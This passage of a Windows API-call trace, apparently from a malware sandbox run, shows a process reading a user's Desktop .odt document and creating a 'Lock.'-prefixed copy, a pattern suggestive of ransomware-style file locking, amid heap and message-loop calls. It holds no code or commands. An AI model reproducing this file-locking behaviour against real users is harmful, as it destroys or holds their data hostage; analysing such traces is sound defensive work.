1 [0164.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0164.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0164.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0164.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0164.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0164.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0164.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0164.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0164.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0164.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0164.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0164.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0164.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0164.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0164.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0164.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0164.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0164.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0164.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0164.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0164.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0164.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0164.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0164.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0164.787] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0164.787] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.787] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.787] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0164.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0164.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0164.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0164.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0164.787] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/GhiVvZ14WbSoIVTo6M.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ghivvz14wbsoivto6m.odt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0164.788] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0164.788] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0164.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0164.788] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0164.788] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.788] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0164.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0164.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0164.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0164.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0164.788] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/Lock.GhiVvZ14WbSoIVTo6M.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lock.ghivvz14wbsoivto6m.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0164.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0164.789] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0164.789] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.789] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0164.789] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0164.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0164.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0164.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0164.789] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0164.790] ReadFile (in: hFile=0x1e8, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0xc4e7, lpOverlapped=0x0) returned 1 [0165.300] ReadFile (in: hFile=0x1e8, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0165.300] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 1 [0165.300] TranslateMessage (lpMsg=0x8bf710) returned 0 [0165.300] DispatchMessageW (lpMsg=0x8bf710) returned 0x0 [0165.301] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0165.301] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0165.301] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0165.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0165.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0165.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0165.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0165.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc4e7) returned 0x24d7a58 [0165.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0165.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0165.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0165.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0165.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0165.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0165.301] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0165.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0165.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0165.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0165.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0165.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0165.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0165.302] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0165.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0165.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0165.302] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0165.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0165.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0165.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0165.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2da8 [0165.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0165.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0165.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0165.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0165.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc4e7) returned 0x24d7a58 [0165.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0165.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2ce8 [0165.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0165.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0165.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0165.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1708 [0165.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0165.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0165.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0165.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2d28 [0165.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0165.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0165.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0165.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acde0 [0165.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0165.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0165.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0165.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0165.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0165.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0165.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0165.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc4e7) returned 0x34b2250 [0165.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0165.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0165.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0165.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0165.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0165.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0165.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0165.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0165.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0165.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0165.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0165.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0165.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0165.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0165.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0165.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0165.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0165.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0165.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0165.306] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0165.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0165.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0165.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0165.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0165.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0165.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0165.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0165.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0165.306] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0165.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0165.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0165.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0165.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0165.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0165.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0165.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0165.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0165.306] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0165.306] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0165.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0165.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0165.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0165.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0165.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0165.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0165.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0165.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0165.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0165.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0165.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0165.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0165.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0165.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0165.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0165.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0165.307] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0165.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0165.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0165.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0165.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0165.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0165.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0165.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0165.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0165.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0165.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0165.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0165.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0165.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0165.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0165.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0165.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0165.308] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0165.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0165.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0165.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0165.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0165.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0165.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0165.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0165.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0165.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0165.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0165.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0165.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0165.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0165.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0165.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0165.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0165.309] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0165.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0165.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0165.309] 